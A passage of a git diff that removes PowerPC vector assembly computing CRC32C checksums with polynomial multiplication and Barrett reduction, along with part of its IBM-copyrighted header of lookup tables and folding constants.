- subi r7,r1,56+2*16 - - stvx v20,0,r6 - stvx v21,off16,r6 - stvx v22,off32,r6 - stvx v23,off48,r6 - stvx v24,off64,r6 - stvx v25,off80,r6 - stvx v26,off96,r6 - stvx v27,off112,r6 - stvx v28,0,r7 - stvx v29,off16,r7 - - mr r10,r3 - - vxor zeroes,zeroes,zeroes - vspltisw v0,-1 - - vsldoi mask_32bit,zeroes,v0,4 - vsldoi mask_64bit,zeroes,v0,8 - - /* Get the initial value into v8 */ - vxor v8,v8,v8 - MTVRD(v8, r3) -#ifdef REFLECT - vsldoi v8,zeroes,v8,8 /* shift into bottom 32 bits */ -#else - vsldoi v8,v8,zeroes,4 /* shift into top 32 bits */ -#endif - -#ifdef BYTESWAP_DATA - addis r3,r2,.byteswap_constant@toc@ha - addi r3,r3,.byteswap_constant@toc@l - - lvx byteswap,0,r3 - addi r3,r3,16 -#endif - - cmpdi r5,256 - blt .Lshort - - rldicr r6,r5,0,56 - - /* Checksum in blocks of MAX_SIZE */ -1: lis r7,MAX_SIZE@h - ori r7,r7,MAX_SIZE@l - mr r9,r7 - cmpd r6,r7 - bgt 2f - mr r7,r6 -2: subf r6,r7,r6 - - /* our main loop does 128 bytes at a time */ - srdi r7,r7,7 - - /* - * Work out the offset into the constants table to start at. Each - * constant is 16 bytes, and it is used against 128 bytes of input - * data - 128 / 16 = 8 - */ - sldi r8,r7,4 - srdi r9,r9,3 - subf r8,r8,r9 - - /* We reduce our final 128 bytes in a separate step */ - addi r7,r7,-1 - mtctr r7 - - addis r3,r2,.constants@toc@ha - addi r3,r3,.constants@toc@l - - /* Find the start of our constants */ - add r3,r3,r8 - - /* zero v0-v7 which will contain our checksums */ - vxor v0,v0,v0 - vxor v1,v1,v1 - vxor v2,v2,v2 - vxor v3,v3,v3 - vxor v4,v4,v4 - vxor v5,v5,v5 - vxor v6,v6,v6 - vxor v7,v7,v7 - - lvx const1,0,r3 - - /* - * If we are looping back to consume more data we use the values - * already in v16-v23. - */ - cmpdi r0,1 - beq 2f - - /* First warm up pass */ - lvx v16,0,r4 - lvx v17,off16,r4 - VPERM(v16,v16,v16,byteswap) - VPERM(v17,v17,v17,byteswap) - lvx v18,off32,r4 - lvx v19,off48,r4 - VPERM(v18,v18,v18,byteswap) - VPERM(v19,v19,v19,byteswap) - lvx v20,off64,r4 - lvx v21,off80,r4 - VPERM(v20,v20,v20,byteswap) - VPERM(v21,v21,v21,byteswap) - lvx v22,off96,r4 - lvx v23,off112,r4 - VPERM(v22,v22,v22,byteswap) - VPERM(v23,v23,v23,byteswap) - addi r4,r4,8*16 - - /* xor in initial value */ - vxor v16,v16,v8 - -2: bdz .Lfirst_warm_up_done - - addi r3,r3,16 - lvx const2,0,r3 - - /* Second warm up pass */ - VPMSUMD(v8,v16,const1) - lvx v16,0,r4 - VPERM(v16,v16,v16,byteswap) - ori r2,r2,0 - - VPMSUMD(v9,v17,const1) - lvx v17,off16,r4 - VPERM(v17,v17,v17,byteswap) - ori r2,r2,0 - - VPMSUMD(v10,v18,const1) - lvx v18,off32,r4 - VPERM(v18,v18,v18,byteswap) - ori r2,r2,0 - - VPMSUMD(v11,v19,const1) - lvx v19,off48,r4 - VPERM(v19,v19,v19,byteswap) - ori r2,r2,0 - - VPMSUMD(v12,v20,const1) - lvx v20,off64,r4 - VPERM(v20,v20,v20,byteswap) - ori r2,r2,0 - - VPMSUMD(v13,v21,const1) - lvx v21,off80,r4 - VPERM(v21,v21,v21,byteswap) - ori r2,r2,0 - - VPMSUMD(v14,v22,const1) - lvx v22,off96,r4 - VPERM(v22,v22,v22,byteswap) - ori r2,r2,0 - - VPMSUMD(v15,v23,const1) - lvx v23,off112,r4 - VPERM(v23,v23,v23,byteswap) - - addi r4,r4,8*16 - - bdz .Lfirst_cool_down - - /* - * main loop. We modulo schedule it such that it takes three iterations - * to complete - first iteration load, second iteration vpmsum, third - * iteration xor. - */ - .balign 16 -4: lvx const1,0,r3 - addi r3,r3,16 - ori r2,r2,0 - - vxor v0,v0,v8 - VPMSUMD(v8,v16,const2) - lvx v16,0,r4 - VPERM(v16,v16,v16,byteswap) - ori r2,r2,0 - - vxor v1,v1,v9 - VPMSUMD(v9,v17,const2) - lvx v17,off16,r4 - VPERM(v17,v17,v17,byteswap) - ori r2,r2,0 - - vxor v2,v2,v10 - VPMSUMD(v10,v18,const2) - lvx v18,off32,r4 - VPERM(v18,v18,v18,byteswap) - ori r2,r2,0 - - vxor v3,v3,v11 - VPMSUMD(v11,v19,const2) - lvx v19,off48,r4 - VPERM(v19,v19,v19,byteswap) - lvx const2,0,r3 - ori r2,r2,0 - - vxor v4,v4,v12 - VPMSUMD(v12,v20,const1) - lvx v20,off64,r4 - VPERM(v20,v20,v20,byteswap) - ori r2,r2,0 - - vxor v5,v5,v13 - VPMSUMD(v13,v21,const1) - lvx v21,off80,r4 - VPERM(v21,v21,v21,byteswap) - ori r2,r2,0 - - vxor v6,v6,v14 - VPMSUMD(v14,v22,const1) - lvx v22,off96,r4 - VPERM(v22,v22,v22,byteswap) - ori r2,r2,0 - - vxor v7,v7,v15 - VPMSUMD(v15,v23,const1) - lvx v23,off112,r4 - VPERM(v23,v23,v23,byteswap) - - addi r4,r4,8*16 - - bdnz 4b - -.Lfirst_cool_down: - /* First cool down pass */ - lvx const1,0,r3 - addi r3,r3,16 - - vxor v0,v0,v8 - VPMSUMD(v8,v16,const1) - ori r2,r2,0 - - vxor v1,v1,v9 - VPMSUMD(v9,v17,const1) - ori r2,r2,0 - - vxor v2,v2,v10 - VPMSUMD(v10,v18,const1) - ori r2,r2,0 - - vxor v3,v3,v11 - VPMSUMD(v11,v19,const1) - ori r2,r2,0 - - vxor v4,v4,v12 - VPMSUMD(v12,v20,const1) - ori r2,r2,0 - - vxor v5,v5,v13 - VPMSUMD(v13,v21,const1) - ori r2,r2,0 - - vxor v6,v6,v14 - VPMSUMD(v14,v22,const1) - ori r2,r2,0 - - vxor v7,v7,v15 - VPMSUMD(v15,v23,const1) - ori r2,r2,0 - -.Lsecond_cool_down: - /* Second cool down pass */ - vxor v0,v0,v8 - vxor v1,v1,v9 - vxor v2,v2,v10 - vxor v3,v3,v11 - vxor v4,v4,v12 - vxor v5,v5,v13 - vxor v6,v6,v14 - vxor v7,v7,v15 - -#ifdef REFLECT - /* - * vpmsumd produces a 96 bit result in the least significant bits - * of the register. Since we are bit reflected we have to shift it - * left 32 bits so it occupies the least significant bits in the - * bit reflected domain. - */ - vsldoi v0,v0,zeroes,4 - vsldoi v1,v1,zeroes,4 - vsldoi v2,v2,zeroes,4 - vsldoi v3,v3,zeroes,4 - vsldoi v4,v4,zeroes,4 - vsldoi v5,v5,zeroes,4 - vsldoi v6,v6,zeroes,4 - vsldoi v7,v7,zeroes,4 -#endif - - /* xor with last 1024 bits */ - lvx v8,0,r4 - lvx v9,off16,r4 - VPERM(v8,v8,v8,byteswap) - VPERM(v9,v9,v9,byteswap) - lvx v10,off32,r4 - lvx v11,off48,r4 - VPERM(v10,v10,v10,byteswap) - VPERM(v11,v11,v11,byteswap) - lvx v12,off64,r4 - lvx v13,off80,r4 - VPERM(v12,v12,v12,byteswap) - VPERM(v13,v13,v13,byteswap) - lvx v14,off96,r4 - lvx v15,off112,r4 - VPERM(v14,v14,v14,byteswap) - VPERM(v15,v15,v15,byteswap) - - addi r4,r4,8*16 - - vxor v16,v0,v8 - vxor v17,v1,v9 - vxor v18,v2,v10 - vxor v19,v3,v11 - vxor v20,v4,v12 - vxor v21,v5,v13 - vxor v22,v6,v14 - vxor v23,v7,v15 - - li r0,1 - cmpdi r6,0 - addi r6,r6,128 - bne 1b - - /* Work out how many bytes we have left */ - andi. r5,r5,127 - - /* Calculate where in the constant table we need to start */ - subfic r6,r5,128 - add r3,r3,r6 - - /* How many 16 byte chunks are in the tail */ - srdi r7,r5,4 - mtctr r7 - - /* - * Reduce the previously calculated 1024 bits to 64 bits, shifting - * 32 bits to include the trailing 32 bits of zeros - */ - lvx v0,0,r3 - lvx v1,off16,r3 - lvx v2,off32,r3 - lvx v3,off48,r3 - lvx v4,off64,r3 - lvx v5,off80,r3 - lvx v6,off96,r3 - lvx v7,off112,r3 - addi r3,r3,8*16 - - VPMSUMW(v0,v16,v0) - VPMSUMW(v1,v17,v1) - VPMSUMW(v2,v18,v2) - VPMSUMW(v3,v19,v3) - VPMSUMW(v4,v20,v4) - VPMSUMW(v5,v21,v5) - VPMSUMW(v6,v22,v6) - VPMSUMW(v7,v23,v7) - - /* Now reduce the tail (0 - 112 bytes) */ - cmpdi r7,0 - beq 1f - - lvx v16,0,r4 - lvx v17,0,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off16,r4 - lvx v17,off16,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off32,r4 - lvx v17,off32,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off48,r4 - lvx v17,off48,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off64,r4 - lvx v17,off64,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off80,r4 - lvx v17,off80,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off96,r4 - lvx v17,off96,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - - /* Now xor all the parallel chunks together */ -1: vxor v0,v0,v1 - vxor v2,v2,v3 - vxor v4,v4,v5 - vxor v6,v6,v7 - - vxor v0,v0,v2 - vxor v4,v4,v6 - - vxor v0,v0,v4 - -.Lbarrett_reduction: - /* Barrett constants */ - addis r3,r2,.barrett_constants@toc@ha - addi r3,r3,.barrett_constants@toc@l - - lvx const1,0,r3 - lvx const2,off16,r3 - - vsldoi v1,v0,v0,8 - vxor v0,v0,v1 /* xor two 64 bit results together */ - -#ifdef REFLECT - /* shift left one bit */ - vspltisb v1,1 - vsl v0,v0,v1 -#endif - - vand v0,v0,mask_64bit - -#ifndef REFLECT - /* - * Now for the Barrett reduction algorithm. The idea is to calculate q, - * the multiple of our polynomial that we need to subtract. By - * doing the computation 2x bits higher (ie 64 bits) and shifting the - * result back down 2x bits, we round down to the nearest multiple. - */ - VPMSUMD(v1,v0,const1) /* ma */ - vsldoi v1,zeroes,v1,8 /* q = floor(ma/(2^64)) */ - VPMSUMD(v1,v1,const2) /* qn */ - vxor v0,v0,v1 /* a - qn, subtraction is xor in GF(2) */ - - /* - * Get the result into r3. We need to shift it left 8 bytes: - * V0 [ 0 1 2 X ] - * V0 [ 0 X 2 3 ] - */ - vsldoi v0,v0,zeroes,8 /* shift result into top 64 bits */ -#else - /* - * The reflected version of Barrett reduction. Instead of bit - * reflecting our data (which is expensive to do), we bit reflect our - * constants and our algorithm, which means the intermediate data in - * our vector registers goes from 0-63 instead of 63-0. We can reflect - * the algorithm because we don't carry in mod 2 arithmetic. - */ - vand v1,v0,mask_32bit /* bottom 32 bits of a */ - VPMSUMD(v1,v1,const1) /* ma */ - vand v1,v1,mask_32bit /* bottom 32bits of ma */ - VPMSUMD(v1,v1,const2) /* qn */ - vxor v0,v0,v1 /* a - qn, subtraction is xor in GF(2) */ - - /* - * Since we are bit reflected, the result (ie the low 32 bits) is in - * the high 32 bits. We just need to shift it left 4 bytes - * V0 [ 0 1 X 3 ] - * V0 [ 0 X 2 3 ] - */ - vsldoi v0,v0,zeroes,4 /* shift result into top 64 bits of */ -#endif - - /* Get it into r3 */ - MFVRD(r3, v0) - -.Lout: - subi r6,r1,56+10*16 - subi r7,r1,56+2*16 - - lvx v20,0,r6 - lvx v21,off16,r6 - lvx v22,off32,r6 - lvx v23,off48,r6 - lvx v24,off64,r6 - lvx v25,off80,r6 - lvx v26,off96,r6 - lvx v27,off112,r6 - lvx v28,0,r7 - lvx v29,off16,r7 - - ld r31,-8(r1) - ld r30,-16(r1) - ld r29,-24(r1) - ld r28,-32(r1) - ld r27,-40(r1) - ld r26,-48(r1) - ld r25,-56(r1) - - blr - -.Lfirst_warm_up_done: - lvx const1,0,r3 - addi r3,r3,16 - - VPMSUMD(v8,v16,const1) - VPMSUMD(v9,v17,const1) - VPMSUMD(v10,v18,const1) - VPMSUMD(v11,v19,const1) - VPMSUMD(v12,v20,const1) - VPMSUMD(v13,v21,const1) - VPMSUMD(v14,v22,const1) - VPMSUMD(v15,v23,const1) - - b .Lsecond_cool_down - -.Lshort: - cmpdi r5,0 - beq .Lzero - - addis r3,r2,.short_constants@toc@ha - addi r3,r3,.short_constants@toc@l - - /* Calculate where in the constant table we need to start */ - subfic r6,r5,256 - add r3,r3,r6 - - /* How many 16 byte chunks? */ - srdi r7,r5,4 - mtctr r7 - - vxor v19,v19,v19 - vxor v20,v20,v20 - - lvx v0,0,r4 - lvx v16,0,r3 - VPERM(v0,v0,v16,byteswap) - vxor v0,v0,v8 /* xor in initial value */ - VPMSUMW(v0,v0,v16) - bdz .Lv0 - - lvx v1,off16,r4 - lvx v17,off16,r3 - VPERM(v1,v1,v17,byteswap) - VPMSUMW(v1,v1,v17) - bdz .Lv1 - - lvx v2,off32,r4 - lvx v16,off32,r3 - VPERM(v2,v2,v16,byteswap) - VPMSUMW(v2,v2,v16) - bdz .Lv2 - - lvx v3,off48,r4 - lvx v17,off48,r3 - VPERM(v3,v3,v17,byteswap) - VPMSUMW(v3,v3,v17) - bdz .Lv3 - - lvx v4,off64,r4 - lvx v16,off64,r3 - VPERM(v4,v4,v16,byteswap) - VPMSUMW(v4,v4,v16) - bdz .Lv4 - - lvx v5,off80,r4 - lvx v17,off80,r3 - VPERM(v5,v5,v17,byteswap) - VPMSUMW(v5,v5,v17) - bdz .Lv5 - - lvx v6,off96,r4 - lvx v16,off96,r3 - VPERM(v6,v6,v16,byteswap) - VPMSUMW(v6,v6,v16) - bdz .Lv6 - - lvx v7,off112,r4 - lvx v17,off112,r3 - VPERM(v7,v7,v17,byteswap) - VPMSUMW(v7,v7,v17) - bdz .Lv7 - - addi r3,r3,128 - addi r4,r4,128 - - lvx v8,0,r4 - lvx v16,0,r3 - VPERM(v8,v8,v16,byteswap) - VPMSUMW(v8,v8,v16) - bdz .Lv8 - - lvx v9,off16,r4 - lvx v17,off16,r3 - VPERM(v9,v9,v17,byteswap) - VPMSUMW(v9,v9,v17) - bdz .Lv9 - - lvx v10,off32,r4 - lvx v16,off32,r3 - VPERM(v10,v10,v16,byteswap) - VPMSUMW(v10,v10,v16) - bdz .Lv10 - - lvx v11,off48,r4 - lvx v17,off48,r3 - VPERM(v11,v11,v17,byteswap) - VPMSUMW(v11,v11,v17) - bdz .Lv11 - - lvx v12,off64,r4 - lvx v16,off64,r3 - VPERM(v12,v12,v16,byteswap) - VPMSUMW(v12,v12,v16) - bdz .Lv12 - - lvx v13,off80,r4 - lvx v17,off80,r3 - VPERM(v13,v13,v17,byteswap) - VPMSUMW(v13,v13,v17) - bdz .Lv13 - - lvx v14,off96,r4 - lvx v16,off96,r3 - VPERM(v14,v14,v16,byteswap) - VPMSUMW(v14,v14,v16) - bdz .Lv14 - - lvx v15,off112,r4 - lvx v17,off112,r3 - VPERM(v15,v15,v17,byteswap) - VPMSUMW(v15,v15,v17) - -.Lv15: vxor v19,v19,v15 -.Lv14: vxor v20,v20,v14 -.Lv13: vxor v19,v19,v13 -.Lv12: vxor v20,v20,v12 -.Lv11: vxor v19,v19,v11 -.Lv10: vxor v20,v20,v10 -.Lv9: vxor v19,v19,v9 -.Lv8: vxor v20,v20,v8 -.Lv7: vxor v19,v19,v7 -.Lv6: vxor v20,v20,v6 -.Lv5: vxor v19,v19,v5 -.Lv4: vxor v20,v20,v4 -.Lv3: vxor v19,v19,v3 -.Lv2: vxor v20,v20,v2 -.Lv1: vxor v19,v19,v1 -.Lv0: vxor v20,v20,v0 - - vxor v0,v19,v20 - - b .Lbarrett_reduction - -.Lzero: - mr r3,r10 - b .Lout - -FUNC_END(__crc32_vpmsum) diff --git a/util/crc32c_ppc_constants.h b/util/crc32c_ppc_constants.h deleted file mode 100644 index aa5ea98f8e2..00000000000 --- a/util/crc32c_ppc_constants.h +++ /dev/null @@ -1,893 +0,0 @@ -// Copyright (C) 2015, 2017 International Business Machines Corp. -// All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. -#ifndef CRC32C_PPC_CONST_H -#define CRC32C_PPC_CONST_H -#define CRC 0x1edc6f41 -#define REFLECT -#define CRC_XOR - -#ifndef __ASSEMBLY__ -#ifdef CRC_TABLE -static const unsigned int crc_table[] = { - 0x00000000, 0xf26b8303, 0xe13b70f7, 0x1350f3f4, 0xc79a971f, 0x35f1141c, - 0x26a1e7e8, 0xd4ca64eb, 0x8ad958cf, 0x78b2dbcc, 0x6be22838, 0x9989ab3b, - 0x4d43cfd0, 0xbf284cd3, 0xac78bf27, 0x5e133c24, 0x105ec76f, 0xe235446c, - 0xf165b798, 0x030e349b, 0xd7c45070, 0x25afd373, 0x36ff2087, 0xc494a384, - 0x9a879fa0, 0x68ec1ca3, 0x7bbcef57, 0x89d76c54, 0x5d1d08bf, 0xaf768bbc, - 0xbc267848, 0x4e4dfb4b, 0x20bd8ede, 0xd2d60ddd, 0xc186fe29, 0x33ed7d2a, - 0xe72719c1, 0x154c9ac2, 0x061c6936, 0xf477ea35, 0xaa64d611, 0x580f5512, - 0x4b5fa6e6, 0xb93425e5, 0x6dfe410e, 0x9f95c20d, 0x8cc531f9, 0x7eaeb2fa, - 0x30e349b1, 0xc288cab2, 0xd1d83946, 0x23b3ba45, 0xf779deae, 0x05125dad, - 0x1642ae59, 0xe4292d5a, 0xba3a117e, 0x4851927d, 0x5b016189, 0xa96ae28a, - 0x7da08661, 0x8fcb0562, 0x9c9bf696, 0x6ef07595, 0x417b1dbc, 0xb3109ebf, - 0xa0406d4b, 0x522bee48, 0x86e18aa3, 0x748a09a0, 0x67dafa54, 0x95b17957, - 0xcba24573, 0x39c9c670, 0x2a993584, 0xd8f2b687, 0x0c38d26c, 0xfe53516f, - 0xed03a29b, 0x1f682198, 0x5125dad3, 0xa34e59d0, 0xb01eaa24, 0x42752927, - 0x96bf4dcc, 0x64d4cecf, 0x77843d3b, 0x85efbe38, 0xdbfc821c, 0x2997011f, - 0x3ac7f2eb, 0xc8ac71e8, 0x1c661503, 0xee0d9600, 0xfd5d65f4, 0x0f36e6f7, - 0x61c69362, 0x93ad1061, 0x80fde395, 0x72966096, 0xa65c047d, 0x5437877e, - 0x4767748a, 0xb50cf789, 0xeb1fcbad, 0x197448ae, 0x0a24bb5a, 0xf84f3859, - 0x2c855cb2, 0xdeeedfb1, 0xcdbe2c45, 0x3fd5af46, 0x7198540d, 0x83f3d70e, - 0x90a324fa, 0x62c8a7f9, 0xb602c312, 0x44694011, 0x5739b3e5, 0xa55230e6, - 0xfb410cc2, 0x092a8fc1, 0x1a7a7c35, 0xe811ff36, 0x3cdb9bdd, 0xceb018de, - 0xdde0eb2a, 0x2f8b6829, 0x82f63b78, 0x709db87b, 0x63cd4b8f, 0x91a6c88c, - 0x456cac67, 0xb7072f64, 0xa457dc90, 0x563c5f93, 0x082f63b7, 0xfa44e0b4, - 0xe9141340, 0x1b7f9043, 0xcfb5f4a8, 0x3dde77ab, 0x2e8e845f, 0xdce5075c, - 0x92a8fc17, 0x60c37f14, 0x73938ce0, 0x81f80fe3, 0x55326b08, 0xa759e80b, - 0xb4091bff, 0x466298fc, 0x1871a4d8, 0xea1a27db, 0xf94ad42f, 0x0b21572c, - 0xdfeb33c7, 0x2d80b0c4, 0x3ed04330, 0xccbbc033, 0xa24bb5a6, 0x502036a5, - 0x4370c551, 0xb11b4652, 0x65d122b9, 0x97baa1ba, 0x84ea524e, 0x7681d14d, - 0x2892ed69, 0xdaf96e6a, 0xc9a99d9e, 0x3bc21e9d, 0xef087a76, 0x1d63f975, - 0x0e330a81, 0xfc588982, 0xb21572c9, 0x407ef1ca, 0x532e023e, 0xa145813d, - 0x758fe5d6, 0x87e466d5, 0x94b49521, 0x66df1622, 0x38cc2a06, 0xcaa7a905, - 0xd9f75af1, 0x2b9cd9f2, 0xff56bd19, 0x0d3d3e1a, 0x1e6dcdee, 0xec064eed, - 0xc38d26c4, 0x31e6a5c7, 0x22b65633, 0xd0ddd530, 0x0417b1db, 0xf67c32d8, - 0xe52cc12c, 0x1747422f, 0x49547e0b, 0xbb3ffd08, 0xa86f0efc, 0x5a048dff, - 0x8ecee914, 0x7ca56a17, 0x6ff599e3, 0x9d9e1ae0, 0xd3d3e1ab, 0x21b862a8, - 0x32e8915c, 0xc083125f, 0x144976b4, 0xe622f5b7, 0xf5720643, 0x07198540, - 0x590ab964, 0xab613a67, 0xb831c993, 0x4a5a4a90, 0x9e902e7b, 0x6cfbad78, - 0x7fab5e8c, 0x8dc0dd8f, 0xe330a81a, 0x115b2b19, 0x020bd8ed, 0xf0605bee, - 0x24aa3f05, 0xd6c1bc06, 0xc5914ff2, 0x37faccf1, 0x69e9f0d5, 0x9b8273d6, - 0x88d28022, 0x7ab90321, 0xae7367ca, 0x5c18e4c9, 0x4f48173d, 0xbd23943e, - 0xf36e6f75, 0x0105ec76, 0x12551f82, 0xe03e9c81, 0x34f4f86a, 0xc69f7b69, - 0xd5cf889d, 0x27a40b9e, 0x79b737ba, 0x8bdcb4b9, 0x988c474d, 0x6ae7c44e, - 0xbe2da0a5, 0x4c4623a6, 0x5f16d052, 0xad7d5351, -}; - -#endif - -#else -#define MAX_SIZE 32768 -.constants : - - /* Reduce 262144 kbits to 1024 bits */ - /* x^261120 mod p(x)` << 1, x^261184 mod p(x)` << 1 */ - .octa 0x00000000b6ca9e20000000009c37c408 - - /* x^260096 mod p(x)` << 1, x^260160 mod p(x)` << 1 */ - .octa 0x00000000350249a800000001b51df26c - - /* x^259072 mod p(x)` << 1, x^259136 mod p(x)` << 1 */ - .octa 0x00000001862dac54000000000724b9d0 - - /* x^258048 mod p(x)` << 1, x^258112 mod p(x)` << 1 */ - .octa 0x00000001d87fb48c00000001c00532fe - - /* x^257024 mod p(x)` << 1, x^257088 mod p(x)` << 1 */ - .octa 0x00000001f39b699e00000000f05a9362 - - /* x^256000 mod p(x)` << 1, x^256064 mod p(x)` << 1 */ - .octa 0x0000000101da11b400000001e1007970 - - /* x^254976 mod p(x)` << 1, x^255040 mod p(x)` << 1 */ - .octa 0x00000001cab571e000000000a57366ee - - /* x^253952 mod p(x)` << 1, x^254016 mod p(x)` << 1 */ - .octa 0x00000000c7020cfe0000000192011284 - - /* x^252928 mod p(x)` << 1, x^252992 mod p(x)` << 1 */ - .octa 0x00000000cdaed1ae0000000162716d9a - - /* x^251904 mod p(x)` << 1, x^251968 mod p(x)` << 1 */ - .octa 0x00000001e804effc00000000cd97ecde - - /* x^250880 mod p(x)` << 1, x^250944 mod p(x)` << 1 */ - .octa 0x0000000077c3ea3a0000000058812bc0 - - /* x^249856 mod p(x)` << 1, x^249920 mod p(x)` << 1 */ - .octa 0x0000000068df31b40000000088b8c12e - - /* x^248832 mod p(x)` << 1, x^248896 mod p(x)` << 1 */ - .octa 0x00000000b059b6c200000001230b234c - - /* x^247808 mod p(x)` << 1, x^247872 mod p(x)` << 1 */ - .octa 0x0000000145fb8ed800000001120b416e - - /* x^246784 mod p(x)` << 1, x^246848 mod p(x)` << 1 */ - .octa 0x00000000cbc0916800000001974aecb0 - - /* x^245760 mod p(x)` << 1, x^245824 mod p(x)` << 1 */ - .octa 0x000000005ceeedc2000000008ee3f226 - - /* x^244736 mod p(x)` << 1, x^244800 mod p(x)` << 1 */ - .octa 0x0000000047d74e8600000001089aba9a - - /* x^243712 mod p(x)` << 1, x^243776 mod p(x)` << 1 */ - .octa 0x00000001407e9e220000000065113872 - - /* x^242688 mod p(x)` << 1, x^242752 mod p(x)` << 1 */ - .octa 0x00000001da967bda000000005c07ec10 - - /* x^241664 mod p(x)` << 1, x^241728 mod p(x)` << 1 */ - .octa 0x000000006c8983680000000187590924 - - /* x^240640 mod p(x)` << 1, x^240704 mod p(x)` << 1 */ - .octa 0x00000000f2d14c9800000000e35da7c6 - - /* x^239616 mod p(x)` << 1, x^239680 mod p(x)` << 1 */ - .octa 0x00000001993c6ad4000000000415855a - - /* x^238592 mod p(x)` << 1, x^238656 mod p(x)` << 1 */ - .octa 0x000000014683d1ac0000000073617758 - - /* x^237568 mod p(x)` << 1, x^237632 mod p(x)` << 1 */ - .octa 0x00000001a7c93e6c0000000176021d28 - - /* x^236544 mod p(x)` << 1, x^236608 mod p(x)` << 1 */ - .octa 0x000000010211e90a00000001c358fd0a - - /* x^235520 mod p(x)` << 1, x^235584 mod p(x)` << 1 */ - .octa 0x000000001119403e00000001ff7a2c18 - - /* x^234496 mod p(x)` << 1, x^234560 mod p(x)` << 1 */ - .octa 0x000000001c3261aa00000000f2d9f7e4 - - /* x^233472 mod p(x)` << 1, x^233536 mod p(x)` << 1 */ - .octa 0x000000014e37a634000000016cf1f9c8 - - /* x^232448 mod p(x)` << 1, x^232512 mod p(x)` << 1 */ - .octa 0x0000000073786c0c000000010af9279a - - /* x^231424 mod p(x)` << 1, x^231488 mod p(x)` << 1 */ - .octa 0x000000011dc037f80000000004f101e8 - - /* x^230400 mod p(x)` << 1, x^230464 mod p(x)` << 1 */ - .octa 0x0000000031433dfc0000000070bcf184 - - /* x^229376 mod p(x)` << 1, x^229440 mod p(x)` << 1 */ - .octa 0x000000009cde8348000000000a8de642 - - /* x^228352 mod p(x)` << 1, x^228416 mod p(x)` << 1 */ - .octa 0x0000000038d3c2a60000000062ea130c - - /* x^227328 mod p(x)` << 1, x^227392 mod p(x)` << 1 */ - .octa 0x000000011b25f26000000001eb31cbb2 - - /* x^226304 mod p(x)` << 1, x^226368 mod p(x)` << 1 */ - .octa 0x000000001629e6f00000000170783448 - - /* x^225280 mod p(x)` << 1, x^225344 mod p(x)` << 1 */ - .octa 0x0000000160838b4c00000001a684b4c6 - - /* x^224256 mod p(x)` << 1, x^224320 mod p(x)` << 1 */ - .octa 0x000000007a44011c00000000253ca5b4 - - /* x^223232 mod p(x)` << 1, x^223296 mod p(x)` << 1 */ - .octa 0x00000000226f417a0000000057b4b1e2 - - /* x^222208 mod p(x)` << 1, x^222272 mod p(x)` << 1 */ - .octa 0x0000000045eb2eb400000000b6bd084c - - /* x^221184 mod p(x)` << 1, x^221248 mod p(x)` << 1 */ - .octa 0x000000014459d70c0000000123c2d592 - - /* x^220160 mod p(x)` << 1, x^220224 mod p(x)` << 1 */ - .octa 0x00000001d406ed8200000000159dafce - - /* x^219136 mod p(x)` << 1, x^219200 mod p(x)` << 1 */ - .octa 0x0000000160c8e1a80000000127e1a64e - - /* x^218112 mod p(x)` << 1, x^218176 mod p(x)` << 1 */ - .octa 0x0000000027ba80980000000056860754 - - /* x^217088 mod p(x)` << 1, x^217152 mod p(x)` << 1 */ - .octa 0x000000006d92d01800000001e661aae8 - - /* x^216064 mod p(x)` << 1, x^216128 mod p(x)` << 1 */ - .octa 0x000000012ed7e3f200000000f82c6166 - - /* x^215040 mod p(x)` << 1, x^215104 mod p(x)` << 1 */ - .octa 0x000000002dc8778800000000c4f9c7ae - - /* x^214016 mod p(x)` << 1, x^214080 mod p(x)` << 1 */ - .octa 0x0000000018240bb80000000074203d20 - - /* x^212992 mod p(x)` << 1, x^213056 mod p(x)` << 1 */ - .octa 0x000000001ad381580000000198173052 - - /* x^211968 mod p(x)` << 1, x^212032 mod p(x)` << 1 */ - .octa 0x00000001396b78f200000001ce8aba54 - - /* x^210944 mod p(x)` << 1, x^211008 mod p(x)` << 1 */ - .octa 0x000000011a68133400000001850d5d94 - - /* x^209920 mod p(x)` << 1, x^209984 mod p(x)` << 1 */ - .octa 0x000000012104732e00000001d609239c - - /* x^208896 mod p(x)` << 1, x^208960 mod p(x)` << 1 */ - .octa 0x00000000a140d90c000000001595f048 - - /* x^207872 mod p(x)` << 1, x^207936 mod p(x)` << 1 */ - .octa 0x00000001b7215eda0000000042ccee08 - - /* x^206848 mod p(x)` << 1, x^206912 mod p(x)` << 1 */ - .octa 0x00000001aaf1df3c000000010a389d74 - - /* x^205824 mod p(x)` << 1, x^205888 mod p(x)` << 1 */ - .octa 0x0000000029d15b8a000000012a840da6 - - /* x^204800 mod p(x)` << 1, x^204864 mod p(x)` << 1 */ - .octa 0x00000000f1a96922000000001d181c0c - - /* x^203776 mod p(x)` << 1, x^203840 mod p(x)` << 1 */ - .octa 0x00000001ac80d03c0000000068b7d1f6 - - /* x^202752 mod p(x)` << 1, x^202816 mod p(x)` << 1 */ - .octa 0x000000000f11d56a000000005b0f14fc - - /* x^201728 mod p(x)` << 1, x^201792 mod p(x)` << 1 */ - .octa 0x00000001f1c022a20000000179e9e730 - - /* x^200704 mod p(x)` << 1, x^200768 mod p(x)` << 1 */ - .octa 0x0000000173d00ae200000001ce1368d6 - - /* x^199680 mod p(x)` << 1, x^199744 mod p(x)` << 1 */ - .octa 0x00000001d4ffe4ac0000000112c3a84c - - /* x^198656 mod p(x)` << 1, x^198720 mod p(x)` << 1 */ - .octa 0x000000016edc5ae400000000de940fee - - /* x^197632 mod p(x)` << 1, x^197696 mod p(x)` << 1 */ - .octa 0x00000001f1a0214000000000fe896b7e 